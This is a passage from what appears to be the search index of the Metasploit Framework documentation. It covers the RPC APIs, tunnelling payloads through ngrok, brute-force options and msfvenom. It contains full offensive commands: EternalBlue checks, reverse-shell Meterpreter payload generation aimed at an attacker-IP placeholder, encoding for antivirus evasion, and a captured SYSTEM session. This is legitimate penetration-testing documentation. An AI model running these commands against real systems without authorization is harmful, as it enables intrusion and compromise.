[11/25/2020 17:35:17] [e(0)] core: DB.connect threw an exception - ActiveRecord::AdapterNotSpecified database configuration does not specify adapter [11/25/2020 17:35:17] [e(0)] core: Failed to connect to the database: database configuration does not specify adapter``` . ",
    "url": "/docs/using-metasploit/advanced/RPC/how-to-use-metasploit-json-rpc.html#starting-the-json-api-server",
    "relUrl": "/docs/using-metasploit/advanced/RPC/how-to-use-metasploit-json-rpc.html#starting-the-json-api-server"
  },"373": {
    "doc": "How to use Metasploit JSON RPC",
    "title": "Concepts",
    "content": "The Metasploit RPC aims to follow the jsonrpc specification. Therefore: . | Each JSON RPC request should provide a unique message ID which the client and server can use to correlate requests and responses | Metasploit may return the following error codes. | . ",
    "url": "/docs/using-metasploit/advanced/RPC/how-to-use-metasploit-json-rpc.html#concepts",
    "relUrl": "/docs/using-metasploit/advanced/RPC/how-to-use-metasploit-json-rpc.html#concepts"
  },"374": {
    "doc": "How to use Metasploit JSON RPC",
    "title": "Examples",
    "content": "First ensure you are running the Metasploit database, and are running the JSON service before running these examples . Querying . Query DB status . Request: . curl --request POST \\ --url http://localhost:8081/api/v1/json-rpc \\ --header 'Content-Type: application/json' \\ --data '{ \"jsonrpc\": \"2.0\", \"method\": \"db.status\", \"id\": 1, \"params\": [] }' . Response: . { \"jsonrpc\": \"2.0\", \"result\": { \"driver\": \"postgresql\", \"db\": \"msf\" }, \"id\": 1 } . Query workspaces . Request: . curl --request POST \\ --url http://localhost:8081/api/v1/json-rpc \\ --header 'Content-Type: application/json' \\ --data '{ \"jsonrpc\": \"2.0\", \"method\": \"db.workspaces\", \"id\": 1, \"params\": [] }' . Response: . { \"jsonrpc\": \"2.0\", \"result\": { \"workspaces\": [ { \"id\": 1, \"name\": \"default\", \"created_at\": 1673368954, \"updated_at\": 1673368954 } ] }, \"id\": 1 } . Modules workflow . Search for modules . Request: . curl --request POST \\ --url http://localhost:8081/api/v1/json-rpc \\ --header 'content-type: application/json' \\ --data '{ \"jsonrpc\": \"2.0\", \"method\": \"module.search\", \"id\": 1, \"params\": [\"psexec author:egypt arch:x64\"] }' . Response: . { \"jsonrpc\": \"2.0\", \"result\": [ { \"type\": \"exploit\", \"name\": \"PsExec via Current User Token\", \"fullname\": \"exploit/windows/local/current_user_psexec\", \"rank\": \"excellent\", \"disclosuredate\": \"1999-01-01\" } ], \"id\": 1 } . Run module check methods . Metasploit modules support running check methods which can be used to identify the success of an exploit module, or to run an auxiliary module against a target. For instance, with an Auxiliary module check request: . curl --request POST \\ --url http://localhost:8081/api/v1/json-rpc \\ --header 'Content-Type: application/json' \\ --data '{ \"jsonrpc\": \"2.0\", \"method\": \"module.check\", \"id\": 1, \"params\": [ \"auxiliary\", \"auxiliary/scanner/ssl/openssl_heartbleed\", { \"RHOST\": \"192.168.123.13\" } ] }' . Or an Exploit module check request: . curl --request POST \\ --url http://localhost:8081/api/v1/json-rpc \\ --header 'content-type: application/json' \\ --data '{ \"jsonrpc\": \"2.0\", \"method\": \"module.check\", \"id\": 1, \"params\": [ \"exploit\", \"exploit/windows/smb/ms17_010_eternalblue\", { \"RHOST\": \"192.168.123.13\" } ] }' . The response will contain an identifier which can be used to query for updates: . { \"jsonrpc\": \"2.0\", \"result\": { \"job_id\": 0, \"uuid\": \"1MIqJ5lViZHSOuaWf1Zz1lpR\" }, \"id\": 1 } . query all running stats . Request: . curl --request POST \\ --url http://localhost:8081/api/v1/json-rpc \\ --header 'Content-Type: application/json' \\ --data '{ \"jsonrpc\": \"2.0\", \"method\": \"module.running_stats\", \"id\": 1, \"params\": [] }' . The response will include the following keys: . | waiting - modules that are queued up, but have not started to run yet | running - currently running modules | results - the module has completed or failed, and the results can be retrieved and acknowledged | . Response: . { \"jsonrpc\": \"2.0\", \"result\": { \"waiting\": [ \"NkJvf4kp4JxcuFCz7rjSuHL1\", \"wRnMQuJ8gzMTp5CaHu18bHdV\" ], \"running\": [ \"b7hIX6G4ZtwvRVRDOXk5ylSx\", \"gx9xTEi6KlH5LJHauyhrHTBn\", ], \"results\": [ \"1MIqJ5lViZHSOuaWf1Zz1lpR\", \"IN5PwYXrjqKfuekQt8cyCENK\", \"Spd1xfgsCZXQABNh7UA3uB58\", \"nRQw0bEvhFcXF0AxtVYOpQku\" ] }, \"id\": 1 } . retrieve module results . It is possible to poll for module results using the id returned when running a module. Request: . curl --request POST \\ --url http://localhost:8081/api/v1/json-rpc \\ --header 'Content-Type: application/json' \\ --data '{ \"jsonrpc\": \"2.0\", \"method\": \"module.results\", \"id\": 1, \"params\": [\"0L37lfcIQqyRK9aBTIVJB4H3\"] }' . Example response when the module is has not yet complete: . { \"jsonrpc\": \"2.0\", \"result\": { \"status\": \"running\" }, \"id\": 1 } . Example error response: . { \"jsonrpc\": \"2.0\", \"result\": { \"status\": \"errored\", \"error\": \"The connection with (192.168.123.13:443) timed out.\" }, \"id\": 1 } . Example success response: . { \"jsonrpc\": \"2.0\", \"result\": { \"status\": \"completed\", \"result\": { \"code\": \"vulnerable\", \"message\": \"The target is vulnerable.\", \"reason\": null, \"details\": { \"os\": \"Windows 7 Enterprise 7601 Service Pack 1\", \"arch\": \"x64\" } } }, \"id\": 1 } . acknowledge module results . This command will also allow Metasploit to remove the result resources from memory. Not acknowledging module results will lead to a memory leak, but the memory is limited to 35mb as the memory datastore used is implemented by ActiveSupport::Cache::MemoryStore . Request: . curl --request POST \\ --url http://localhost:8081/api/v1/json-rpc \\ --header 'Content-Type: application/json' \\ --data '{ \"jsonrpc\": \"2.0\", \"method\": \"module.ack\", \"id\": 1, \"params\": [\"nRQw0bEvhFcXF0AxtVYOpQku\"] }' . Response: . { \"jsonrpc\": \"2.0\", \"result\": { \"success\": true }, \"id\": 1 } . Analyzing hosts workflow . Metasploit supports an analyze command which suggests modules to run based on what a user has already learned and stored about a host. First report a host: . curl --request POST \\ --url http://localhost:8081/api/v1/json-rpc \\ --header 'Authorization: Bearer ' \\ --header 'Content-Type: application/json' \\ --data '{ \"jsonrpc\": \"2.0\", \"method\": \"db.report_host\", \"id\": 1, \"params\": [ { \"workspace\": \"default\", \"host\": \"10.0.0.1\", \"state\": \"alive\", \"os_name\": \"Windows\", \"os_flavor\": \"Enterprize\", \"os_sp\": \"SP2\", \"os_lang\": \"English\", \"arch\": \"ARCH_X86\", \"mac\": \"97-42-51-F2-A7-A7\", \"scope\": \"eth2\", \"virtual_host\": \"VMWare\" } ] }' # response: {\"jsonrpc\":\"2.0\",\"result\":{\"result\":\"success\"},\"id\":1} . Report the host vulnerabilities: . curl --request POST \\ --url http://localhost:8081/api/v1/json-rpc \\ --header 'Authorization: Bearer ' \\ --header 'Content-Type: application/json' \\ --data '{ \"jsonrpc\": \"2.0\", \"method\": \"db.report_vuln\", \"id\": 1, \"params\": [ { \"workspace\": \"default\", \"host\": \"10.0.0.1\", \"name\": \"Exploit Name\", \"info\": \"Human readable description of the vuln\", \"refs\": [ \"CVE-2017-0143\", \"CVE-2017-0144\", \"CVE-2017-0145\", \"CVE-2017-0146\", \"CVE-2017-0147\", \"CVE-2017-0148\" ] } ] }' # response: {\"jsonrpc\":\"2.0\",\"result\":{\"result\":\"success\"},\"id\":1} . Run the analyze command: . curl --request POST \\ --url http://localhost:8081/api/v1/json-rpc \\ --header 'Authorization: Bearer ' \\ --header 'Content-Type: application/json' \\ --data '{ \"jsonrpc\": \"2.0\", \"method\": \"db.analyze_host\", \"id\": 1, \"params\": [ { \"workspace\": \"default\", \"host\": \"10.0.0.1\" } ] }' . Response: . { \"jsonrpc\": \"2.0\", \"result\": { \"host\": { \"address\": \"10.0.0.1\", \"modules\": [ { \"mtype\": \"exploit\", \"mname\": \"exploit/windows/smb/ms17_010_eternalblue\", \"state\": \"READY_FOR_TEST\", \"description\": \"ready for testing\", \"options\": { \"invalid\": [], \"missing\": [] } } ] } }, \"id\": 1 } . When analyzing a host, it is also possible to specify payload requirements for additional granularity: . curl --request POST \\ --url http://localhost:8081/api/v1/json-rpc \\ --header 'Authorization: Bearer ' \\ --header 'Content-Type: application/json' \\ --data '{ \"jsonrpc\": \"2.0\", \"method\": \"db.analyze_host\", \"id\": 1, \"params\": [ { \"workspace\": \"default\", \"host\": \"10.0.0.1\", \"payload\": \"payload/cmd/unix/reverse_bash\" } ] }' . ",
    "url": "/docs/using-metasploit/advanced/RPC/how-to-use-metasploit-json-rpc.html#examples",
    "relUrl": "/docs/using-metasploit/advanced/RPC/how-to-use-metasploit-json-rpc.html#examples"
  },"375": {
    "doc": "How to use Metasploit JSON RPC",
    "title": "How to use Metasploit JSON RPC",
    "content": "The RPC API enables you to programmatically drive the Metasploit Framework and commercial products using HTTP-based remote procedure call (RPC) services. An RPC service is a collection of message types and remote methods that provide a structured way for external applications to interact with web applications. You can use the RPC interface to locally or remotely execute Metasploit commands to perform basic tasks like running modules, communicating with the database, interacting with sessions, exporting data, and generating reports. The Metasploit products are written primarily in Ruby, which is the easiest way to use the remote API. However, in addition to Ruby, any language with support for HTTPS and MessagePack, such as Python, Java, and C, can be used to take advantage of the RPC API. There are currently two implementations of Metasploit’s RPC: . | HTTP and messagepack - covered by a separate guide | HTTP and JSON - covered by this guide | . Note that both the messagepack and JSON RPC services provide very similar operations, and it is worth reviewing both documents. ",
    "url": "/docs/using-metasploit/advanced/RPC/how-to-use-metasploit-json-rpc.html",
    "relUrl": "/docs/using-metasploit/advanced/RPC/how-to-use-metasploit-json-rpc.html"
  },"376": {
    "doc": "How to use Metasploit Messagepack RPC",
    "title": "Starting the messagepack RPC Server",
    "content": "Before you can use the RPC interface, you must start the RPC server. There are a couple of ways that you can start the server depending on the Metasploit product you are using. For this example we will use the MSFRPD Login Utility, but other methods can be found here. Use the follow command setting a username and password, current example uses user and pass retrospectively: . $ ruby msfrpcd -U &amp;lt;username&amp;gt; -P &amp;lt;pass&amp;gt; -f . ",
    "url": "/docs/using-metasploit/advanced/RPC/how-to-use-metasploit-messagepack-rpc.html#starting-the-messagepack-rpc-server",
    "relUrl": "/docs/using-metasploit/advanced/RPC/how-to-use-metasploit-messagepack-rpc.html#starting-the-messagepack-rpc-server"
  },"377": {
    "doc": "How to use Metasploit Messagepack RPC",
    "title": "Connecting with the MSFRPC Login Utility",
    "content": "The msfrpc login utility enables you to connect to the RPC server through msfrpcd. If you started the server using the msfrpcd tool, cd into your framework directory, if you’re a Framework user, or the metasploit/apps/pro/msf3 directory if you are a Pro user, and run the following command to connect to the server: . $ ruby msfrpc -U &amp;lt;username&amp;gt; -P &amp;lt;pass&amp;gt; -a &amp;lt;ip address&amp;gt; . You can provide the following options: . | -P &amp;lt;opt&amp;gt; - The password to access msfrpcd. | -S - Enables or disables SSL on the RPC socket. Set this value to true or false. SSL is on by default. | -U &amp;lt;opt&amp;gt; - The username to access msfrpcd. | -a &amp;lt;opt&amp;gt; - The address msfrpcd runs on. | -p &amp;lt;opt&amp;gt; - The port the msfrpc listens on. The default port is 55553. | . For example, if you want to connect to the local server, you can enter the following command: . $ ruby msfrpc -U user -P pass123 -a 127.0.0.1 . Which returns the following response: . [*] exec: ruby msfrpc -U user -P pass123 -a 127.0.0.1 [*] The 'rpc' object holds the RPC client interface [*] Use rpc.call('group.command') to make RPC calls . ",
    "url": "/docs/using-metasploit/advanced/RPC/how-to-use-metasploit-messagepack-rpc.html#connecting-with-the-msfrpc-login-utility",
    "relUrl": "/docs/using-metasploit/advanced/RPC/how-to-use-metasploit-messagepack-rpc.html#connecting-with-the-msfrpc-login-utility"
  },"378": {
    "doc": "How to use Metasploit Messagepack RPC",
    "title": "RPC Workflow examples",
    "content": "Start the server . Use the following command to run the server with a configured uesrname and password: . $ ruby msfrpcd -U user -P pass -f . Start the client in second terminal tab . Use the username and password set in the previous command to access the client: . # Start the client in second terminal tab $ ruby msfrpc -U user -P pass -a 0.0.0.0 . An interactive prompt will open: . [*] The 'rpc' object holds the RPC client interface [*] Use rpc.call('group.command') to make RPC calls . Commands . Before looking at commands, we will list the options that can be pass into RPC calls: . --rpc-host HOST --rpc-port PORT --rpc-ssl &amp;lt;true|false&amp;gt; --rpc-uri URI --rpc-user USERNAME --rpc-pass PASSWORD --rpc-token TOKEN --rpc-config CONFIG-FILE --rpc-help . Auxiliary module example . To execute the scanner/smb/smb_enumshares module: . &amp;gt;&amp;gt; rpc.call(\"module.execute\", \"auxiliary\", \"scanner/smb/smb_enumshares\", {\"RHOSTS\" =&amp;gt; \"192.168.175.135\", \"SMBUSER\" =&amp;gt; \"Administrator\", \"SMBPASS\" =&amp;gt; \"Password1\"}) =&amp;gt; {\"job_id\"=&amp;gt;0, \"uuid\"=&amp;gt;\"yJWES2Y6d4MRyfFLWjqhqvon\"} . Note that the result returns the job_id and uuid - which can be used for tracking the module’s progress. The arguments supplied are: . | \"module.execute\" - The method you want to call against the module | \"auxiliary\" - the module type | \"scanner/smb/smb_enumshares\" - The specific module you want to run | {\"RHOSTS\" =&amp;gt; \"192.168.175.135\", \"SMBUSER\" =&amp;gt; \"Administrator\", \"SMBPASS\" =&amp;gt; \"Password1\"} - The module’s datastore options | . Query all running stats with: . &amp;gt;&amp;gt; rpc.call('module.running_stats') =&amp;gt; {\"waiting\"=&amp;gt;[], \"running\"=&amp;gt;[], \"results\"=&amp;gt;[\"yJWES2Y6d4MRyfFLWjqhqvon\"]} . Note that the output contains the previous uuid, which has now been marked as completed. To view the module results for a given UUID: . &amp;gt;&amp;gt; rpc.call('module.results', 'yJWES2Y6d4MRyfFLWjqhqvon') =&amp;gt; {\"status\"=&amp;gt;\"completed\", \"result\"=&amp;gt;nil} . Listing current jobs/sessions . To list the current jobs: . &amp;gt;&amp;gt; rpc.call('job.list') =&amp;gt; {\"0\"=&amp;gt;\"Exploit: windows/smb/ms17_010_psexec\"} . To list the current sessions: . &amp;gt;&amp;gt; rpc.call('session.list') =&amp;gt; {1=&amp;gt; {\"type\"=&amp;gt;\"meterpreter\", \"tunnel_local\"=&amp;gt;\"192.168.8.125:4444\", \"tunnel_peer\"=&amp;gt;\"192.168.8.125:63504\", \"via_exploit\"=&amp;gt;\"exploit/windows/smb/psexec\", \"via_payload\"=&amp;gt;\"payload/windows/meterpreter/reverse_tcp\", \"desc\"=&amp;gt;\"Meterpreter\", \"info\"=&amp;gt;\"NT AUTHORITY\\\\SYSTEM @ DC1\", \"workspace\"=&amp;gt;\"false\", \"session_host\"=&amp;gt;\"192.168.175.135\", \"session_port\"=&amp;gt;445, \"target_host\"=&amp;gt;\"192.168.175.135\", \"username\"=&amp;gt;\"cgranleese\", \"uuid\"=&amp;gt;\"hqtjjwgx\", \"exploit_uuid\"=&amp;gt;\"hldyog8j\", \"routes\"=&amp;gt;\"\", \"arch\"=&amp;gt;\"x86\", \"platform\"=&amp;gt;\"windows\"}} . Killing sessions . To stop an active session use the session.stop command and pass the session ID. To find the session ID you can use the session.list command. rpc.call('session.stop', 1) . Example workflows . Let’s look at a some workflows using the commands we discussed above for a complete workflow. Auxiliary module workflow . [*] The 'rpc' object holds the RPC client interface [*] Use rpc.call('group.command') to make RPC calls &amp;gt;&amp;gt; rpc.call(\"module.execute\", \"auxiliary\", \"scanner/smb/smb_enumshares\", {\"RHOSTS\" =&amp;gt; \"xxx.xxx.xxx.xxx\", \"SMBUSER\" =&amp;gt; \"user\", \"SMBPASS\" =&amp;gt; \"password\"}) =&amp;gt; {\"job_id\"=&amp;gt;0, \"uuid\"=&amp;gt;\"yJWES2Y6d4MRyfFLWjqhqvon\"} &amp;gt;&amp;gt; rpc.call('module.running_stats') =&amp;gt; {\"waiting\"=&amp;gt;[], \"running\"=&amp;gt;[], \"results\"=&amp;gt;[\"yJWES2Y6d4MRyfFLWjqhqvon\"]} &amp;gt;&amp;gt; rpc.call('module.results', 'yJWES2Y6d4MRyfFLWjqhqvon') =&amp;gt; {\"status\"=&amp;gt;\"completed\", \"result\"=&amp;gt;nil} . Exploit module workflow . This workflow makes use of the module.check method to check if the target is vulnerable to the module’s exploit: . [*] The 'rpc' object holds the RPC client interface [*] Use rpc.call('group.command') to make RPC calls &amp;gt;&amp;gt; rpc.call(\"module.check\", \"exploit\", \"windows/smb/ms17_010_psexec\", {\"RHOSTS\" =&amp;gt; xxx.xxx.xxx.xxx\", \"SMBUSER\" =&amp;gt; \"user\", \"SMBPASS\" =&amp;gt; \"password\"}) =&amp;gt; {\"job_id\"=&amp;gt;0, \"uuid\"=&amp;gt;\"q3eewYtM3LqxuVN5ai1Wya3i\"} &amp;gt;&amp;gt; rpc.call('module.running_stats') =&amp;gt; {\"waiting\"=&amp;gt;[], \"running\"=&amp;gt;[], \"results\"=&amp;gt;[\"q3eewYtM3LqxuVN5ai1Wya3i\"]} &amp;gt;&amp;gt; rpc.call('module.results', 'q3eewYtM3LqxuVN5ai1Wya3i') =&amp;gt; {\"status\"=&amp;gt;\"completed\", \"result\"=&amp;gt;{\"code\"=&amp;gt;\"vulnerable\", \"message\"=&amp;gt;\"The target is vulnerable.\", \"reason\"=&amp;gt;nil, \"details\"=&amp;gt;{\"os\"=&amp;gt;\"Windows 8.1 9600\", \"arch\"=&amp;gt;\"x64\"}}} . The module.result calls shows that the target is vulnerable, and additional metadata about the target has been returned. ",
    "url": "/docs/using-metasploit/advanced/RPC/how-to-use-metasploit-messagepack-rpc.html#rpc-workflow-examples",
    "relUrl": "/docs/using-metasploit/advanced/RPC/how-to-use-metasploit-messagepack-rpc.html#rpc-workflow-examples"
  },"379": {
    "doc": "How to use Metasploit Messagepack RPC",
    "title": "How to use Metasploit Messagepack RPC",
    "content": "The RPC API enables you to programmatically drive the Metasploit Framework and commercial products using HTTP-based remote procedure call (RPC) services. An RPC service is a collection of message types and remote methods that provide a structured way for external applications to interact with web applications. You can use the RPC interface to locally or remotely execute Metasploit commands to perform basic tasks like running modules, communicating with the database, interacting with sessions, exporting data, and generating reports. The Metasploit products are written primarily in Ruby, which is the easiest way to use the remote API. However, in addition to Ruby, any language with support for HTTPS and MessagePack, such as Python, Java, and C, can be used to take advantage of the RPC API. There are currently two implementations of Metasploit’s RPC: . | HTTP and messagepack - covered by this guide | HTTP and JSON - covered by a separate guide | . Note that both the messagepack and JSON RPC services provide very similar operations, and it is worth reviewing both documents. ",
    "url": "/docs/using-metasploit/advanced/RPC/how-to-use-metasploit-messagepack-rpc.html",
    "relUrl": "/docs/using-metasploit/advanced/RPC/how-to-use-metasploit-messagepack-rpc.html"
  },"380": {
    "doc": "How to use Metasploit with ngrok",
    "title": "Overview",
    "content": "ngrok is a popular service that offers free port-forwarding that is easy to setup without needing to run a dedicated server on a public IP address (as is the case with SSH, socat and other more traditional options. This means that users behind a SNATing device such as a SOHO router can accept reverse shells and other connections without needing to configure port forwarding. WARNING: The nature of using ngrok is to send traffic through a third party. ngrok and the server which it utilizes are not affiliated with the Metasploit project. Use of ngrok effectively sends traffic through an untrusted third party and should be done with extreme caution. While Meterpreter has offered end-to-end encryption since Metasploit 6.0, other payloads and connections do not. ngrok can start multiple types of tunnels. The tcp tunnel is compatible with Metasploit’s payloads and most closely resembles a traditional port-forwarding configuration. The http tunnel type is not compatible with payloads, and should not be used. The tls tunnel type may be compatible, but access to it is restricted to the Enterprise and Pay-as-you-go paid plans. This document will focus on the use cases for the tcp tunnel type. Note that one limitation is that the public port can not be configured, it is randomly selected by ngrok meaning that the target will need to be able to connect to this high, obscure port which may be prevented by egress filtering. ",
    "url": "/docs/using-metasploit/other/how-to-use-metasploit-with-ngrok.html#overview",
    "relUrl": "/docs/using-metasploit/other/how-to-use-metasploit-with-ngrok.html#overview"
  },"381": {
    "doc": "How to use Metasploit with ngrok",
    "title": "Usage with payloads",
    "content": "Use with payloads can be achieved with any of the reverse-connection stagers that accept LHOST and LPORT options, e.g. reverse_tcp, reverse_http, reverse_https, etc. but not reverse_named_pipe. In the following scenario, ngrok will be used to forward a random public port to the Metasploit listener on port 4444. This scenario assumes that Metasploit and ngrok are running on the same host. NOTE: At this time, payloads handle DNS hostnames inconsistently. Some are compatible with hostnames while others require IP addresses to be specified as the target to connect to (the LHOST option). To ensure the specified payload will work, the hostname provided by ngrok should be resolved to an IP address and the IP address should be used as the value for LHOST. | Start a TCP tunnel using ngrok: ngrok tcp localhost:4444. | ngrok should start running and display a few settings, including a line that says “Forwarding”. Note the host and port number from this line, e.g. 4.tcp.ngrok.io:13779 | Resolve the hostname from the previous step to an IP address. | Start msfconsole and use the desired payload or exploit module. | Using msfconsole for both generating the payload and handling the connection is recommended over using msfvenom for two reasons. | . | Using msfvenom starts up an instance of the framework to generate the payload, making it a slower process. | Using msfconsole to configure both the payload and handler simultaneously ensures that the options are set for both, eliminating the possibility that they are out of sync. | . | Set the LHOST option to the IP address noted in step 3. This is where the payload is expecting to connect to. | Set the LPORT option to the port noted in step 2, 13779 in the example. | Set the ReverseListenerBindAddress option to 127.0.0.1. This is where the connection will actually be accepted from ngrok. | Set the ReverseListenerBindPort option to 4444. | Either run the exploit, or generate the payload with the generate command and start the handler with to_handler | . Once the payload has been executed, either through the exploit or manual means, there should be a open connection seen through the ngrok terminal. Payload Demo . ngrok side: . $ ngrok tcp localhost:4444 ngrok (Ctrl+C to quit) Take our ngrok in production survey! https://forms.gle/aXiBFWzEA36DudFn6 Session Status online Account ????? (Plan: Personal) Version 3.16.0 Region United States (us) Latency 33ms Web Interface http://127.0.0.1:4040 Forwarding tcp://4.tcp.ngrok.io:17511 -&amp;gt; localhost:4444 Connections ttl opn rt1 rt5 p50 p90 0 0 0.00 0.00 0.00 0.00 . resolve the hostname 4.tcp.ngrok.io to an IP address . $ dig +short 4.tcp.ngrok.io 192.0.2.1 . metasploit side: . msf6 &amp;gt; use payload/windows/x64/meterpreter/reverse_http msf6 payload(windows/x64/meterpreter/reverse_http) &amp;gt; set LHOST 192.0.2.1 LHOST =&amp;gt; 192.0.2.1 msf6 payload(windows/x64/meterpreter/reverse_http) &amp;gt; set LPORT 17511 LPORT =&amp;gt; 17511 msf6 payload(windows/x64/meterpreter/reverse_http) &amp;gt; set ReverseListenerBindAddress 127.0.0.1 ReverseListenerBindAddress =&amp;gt; 127.0.0.1 msf6 payload(windows/x64/meterpreter/reverse_http) &amp;gt; set ReverseListenerBindPort 4444 ReverseListenerBindPort =&amp;gt; 4444 msf6 payload(windows/x64/meterpreter/reverse_http) &amp;gt; to_handler [*] Payload Handler Started as Job 2 msf6 payload(windows/x64/meterpreter/reverse_http) &amp;gt; [*] Started HTTP reverse handler on http://127.0.0.1:4444 msf6 payload(windows/x64/meterpreter/reverse_http) &amp;gt; generate -f exe -o ngrok_payload.exe [*] Writing 7168 bytes to ngrok_payload.exe... msf6 payload(windows/x64/meterpreter/reverse_http) &amp;gt; [*] http://127.0.0.1:4444 handling request from 127.0.0.1; (UUID: ghzekibo) Staging x64 payload (202844 bytes) ... [*] Meterpreter session 1 opened (127.0.0.1:4444 -&amp;gt; 127.0.0.1:55468) at 2024-09-10 16:43:58 -0400 msf6 payload(windows/x64/meterpreter/reverse_http) &amp;gt; sessions -i -1 [*] Starting interaction with 1... meterpreter &amp;gt; getuid Server username: MSFLAB\\smcintyre meterpreter &amp;gt; . ",
    "url": "/docs/using-metasploit/other/how-to-use-metasploit-with-ngrok.html#usage-with-payloads",
    "relUrl": "/docs/using-metasploit/other/how-to-use-metasploit-with-ngrok.html#usage-with-payloads"
  },"382": {
    "doc": "How to use Metasploit with ngrok",
    "title": "Usage with server modules",
    "content": "Some modules expect connections to be made to them by the target. These modules can also be used with ngrok, with some slight variations to the payload workflow in regards to their datastore options. Modules that start servers can be identified by using the SRVHOST and SRVPORT datastore options. NOTE: Free ngrok plans can only open one tcp tunnel at a time. This means that if the module is an exploit that a tcp tunnel for a reverse-connection payload will not be able to be opened at the same time. Use a second ngrok account to open a second tcp tunnel and follow the steps above for the payload configuration. | Start a TCP tunnel using ngrok: ngrok tcp localhost:4444. | ngrok should start running and display a few settings, including a line that says “Forwarding”. Note the host and port number from this line, e.g. 4.tcp.ngrok.io:13779 | Resolve the hostname from the previous step to an IP address. | Start msfconsole and use the desired module. | Set the LHOST option to the IP address noted in step 3. This is where the payload is expecting to connect to. | Set the SRVPORT option to the port noted in step 2, 13779 in the example. | Set the ListenerBindAddress option to 127.0.0.1. This is where the connection will actually be accepted from ngrok. | Set the ListenerBindPort option to 4444. | Run the module | . ",
    "url": "/docs/using-metasploit/other/how-to-use-metasploit-with-ngrok.html#usage-with-server-modules",
    "relUrl": "/docs/using-metasploit/other/how-to-use-metasploit-with-ngrok.html#usage-with-server-modules"
  },"383": {
    "doc": "How to use Metasploit with ngrok",
    "title": "How to use Metasploit with ngrok",
    "content": " ",
    "url": "/docs/using-metasploit/other/how-to-use-metasploit-with-ngrok.html",
    "relUrl": "/docs/using-metasploit/other/how-to-use-metasploit-with-ngrok.html"
  },"384": {
    "doc": "AuthBrute",
    "title": "How to use Msf::Auxiliary::AuthBrute to write a bruteforcer",
    "content": "The Msf::Auxiliary::AuthBrute mixin should no longer be used to write a login module, you should try our LoginScanner API instead. However, some of the datastore options are still needed, so let’s go over them right quick. Regular options . | USERNAME - (String) A specific username to authenticate as. | PASSWORD - (String) A specific password to authenticate with. | USER_FILE - (String) File containing usernames, one per line. | PASS_FILE - (String) File containing passwords, one per line. | USERPASS_FILE - (String) File containing users and passwords separated by space, one pair per line. | BRUTEFORCE_SPEED - (Integer) How fast to bruteforce, from 0 to 5. | VERBOSE - (Boolean) Whether to print output for all attempts. | BLANK_PASSWORDS - (Boolean) Try blank passwords for all users. | USER_AS_PASS - (Boolean) Try the username as the password for all users. | DB_ALL_CREDS - (Boolean) Try each user/password couple stored in the current database. | DB_ALL_USERS - (Boolean) Add all users in the current database to the list. | STOP_ON_SUCCESS - (Boolean) Stop guessing when a credential works for a host. | . Advanced options . | REMOVE_USER_FILE - (Boolean) Automatically delete the USER_FILE on module completion. | REMOVE_PASS_FILE - (Boolean) Automatically delete the PASS_FILE on module completion. | REMOVE_USERPASS_FILE - (Boolean) Automatically delete the USERPASS_FILE on module completion. | MaxGuessesPerService - (Integer) Maximum number of credentials to try per service instance. If set to zero or a non-number, this option will not be used. | MaxMinutesPerService - (Integer) Maximum time in minutes to bruteforce the service instance. If set to zero or a non-number, this option will not be used. | MaxGuessesPerUser - (Integer) Maximum guesses for a particular username for the service instance. Note that users are considered unique among different services, so a user at 10.1.1.1:22 is different from one at 10.2.2.2:22, and both will be tried up to the MaxGuessesPerUser limit. If set to zero or a non-number, this option will not be used. | . Reference . | https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/auxiliary/auth_brute.rb | . ",
    "url": "/docs/development/developing-modules/libraries/how-to-use-msf-auxiliary-authbrute-to-write-a-bruteforcer.html#how-to-use-msfauxiliaryauthbrute-to-write-a-bruteforcer",
    "relUrl": "/docs/development/developing-modules/libraries/how-to-use-msf-auxiliary-authbrute-to-write-a-bruteforcer.html#how-to-use-msfauxiliaryauthbrute-to-write-a-bruteforcer"
  },"385": {
    "doc": "AuthBrute",
    "title": "AuthBrute",
    "content": " ",
    "url": "/docs/development/developing-modules/libraries/how-to-use-msf-auxiliary-authbrute-to-write-a-bruteforcer.html",
    "relUrl": "/docs/development/developing-modules/libraries/how-to-use-msf-auxiliary-authbrute-to-write-a-bruteforcer.html"
  },"386": {
    "doc": "How to use msfvenom",
    "title": "How to generate a payload",
    "content": "To generate a payload, there are two flags that you must supply (-p and -f): . | The -p flag: Specifies what payload to generate | . To see what payloads are available from Framework, you can do: ./msfvenom -l payloads . The -p flag also supports “-“ as a way to accept a custom payload: . cat payload_file.bin | ./msfvenom -p - -a x86 --platform win -e x86/shikata_ga_nai -f raw . | The -f flag: Specifies the format of the payload | . Syntax example: ./msfvenom -p windows/meterpreter/bind_tcp -f exe . To see what formats are supported, you can do the following to find out: ./msfvenom --help-formats . Typically, this is probably how you will use msfvenom: . $ ./msfvenom -p windows/meterpreter/reverse_tcp lhost=[Attacker's IP] lport=4444 -f exe -o /tmp/my_payload.exe . ",
    "url": "/docs/using-metasploit/basics/how-to-use-msfvenom.html#how-to-generate-a-payload",
    "relUrl": "/docs/using-metasploit/basics/how-to-use-msfvenom.html#how-to-generate-a-payload"
  },"387": {
    "doc": "How to use msfvenom",
    "title": "How to encode a payload",
    "content": "By default, the encoding feature will automatically kick in when you use the -b flag (the badchar flag). In other cases, you must use the -e flag like the following: ./msfvenom -p windows/meterpreter/bind_tcp -e x86/shikata_ga_nai -f raw . To find out what encoders you can use, you can use the -l flag: ./msfvenom -l encoders . You can also encode the payload multiple times using the -i flag. Sometimes more iterations may help avoiding antivirus, but know that encoding isn’t really meant to be used a real AV evasion solution: ./msfvenom -p windows/meterpreter/bind_tcp -e x86/shikata_ga_nai -i 3 . ",
    "url": "/docs/using-metasploit/basics/how-to-use-msfvenom.html#how-to-encode-a-payload",
    "relUrl": "/docs/using-metasploit/basics/how-to-use-msfvenom.html#how-to-encode-a-payload"
  },"388": {
    "doc": "How to use msfvenom",
    "title": "How to avoid bad characters",
    "content": "The -b flag is meant to be used to avoid certain characters in the payload. When this option is used, msfvenom will automatically find a suitable encoder to encode the payload: ./msfvenom -p windows/meterpreter/bind_tcp -b '\\x00' -f raw . ",
    "url": "/docs/using-metasploit/basics/how-to-use-msfvenom.html#how-to-avoid-bad-characters",
    "relUrl": "/docs/using-metasploit/basics/how-to-use-msfvenom.html#how-to-avoid-bad-characters"
  },"389": {
    "doc": "How to use msfvenom",
    "title": "How to supply a custom template",
